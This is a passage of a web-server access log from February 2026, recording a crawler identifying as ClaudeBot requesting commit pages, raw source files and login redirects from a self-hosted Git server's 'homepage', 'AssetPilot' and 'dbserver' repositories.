+claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Fapp%2Fmodels.py" [Client 216.73.216.188] [Length 20580] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 11303] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16470] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11282] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj%2Fproject.assets.json" [Client 216.73.216.188] [Length 4854] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" [Client 216.73.216.188] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14193] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" [Client 216.73.216.188] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" [Client 216.73.216.188] [Length 13925] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13429] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html?display=source" [Client 216.73.216.188] [Length 21827] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4854] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13871] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16708] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fstatic%2Fcss" [Client 216.73.216.188] [Length 34990] [Gzip 8.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 14205] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" [Client 216.73.216.188] [Length 10366] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14497] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json?display=source" [Client 216.73.216.188] [Length 11094] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj%2Fproject.nuget.cache" [Client 216.73.216.188] [Length 4854] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 14161] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" [Client 216.73.216.188] [Length 11342] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11320] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json?display=source" [Client 216.73.216.188] [Length 11689] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" [Client 216.73.216.188] [Length 14648] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12762] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 216.73.216.188] [Length 20908] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 11886] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa%2Fasset_pilot_docker%2Fapp" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2Fassets%2Fjs" [Client 216.73.216.188] [Length 18588] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/keys.json?display=rendered" [Client 216.73.216.188] [Length 11165] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16482] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3%2Fasset_pilot_docker%2Fstatic" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpython3.12" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 14896] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json?display=source" [Client 216.73.216.188] [Length 11681] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64?display=source" [Client 216.73.216.188] [Length 11062] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14210] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13938] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13887] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 216.73.216.188] [Length 10902] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj%2FOpcConnectionTest.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj%2FDebug%2Fnet8.0" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14666] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py?display=source" [Client 216.73.216.188] [Length 13018] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Fstatic" [Client 216.73.216.188] [Length 96582] [Gzip 11.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 22555] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" [Client 216.73.216.188] [Length 11519] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Finclude%2Fsite%2Fpython3.12" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" [Client 216.73.216.188] [Length 21806] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13143] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 216.73.216.188] [Length 11141] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services" [Client 216.73.216.188] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpython3" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" [Client 216.73.216.188] [Length 11074] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa%2Fasset_pilot_docker%2Fstatic" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" [Client 216.73.216.188] [Length 12772] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" [Client 216.73.216.188] [Length 10361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:32 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fcomponents" [Client 216.73.216.188] [Length 60424] [Gzip 8.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 11300] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" [Client 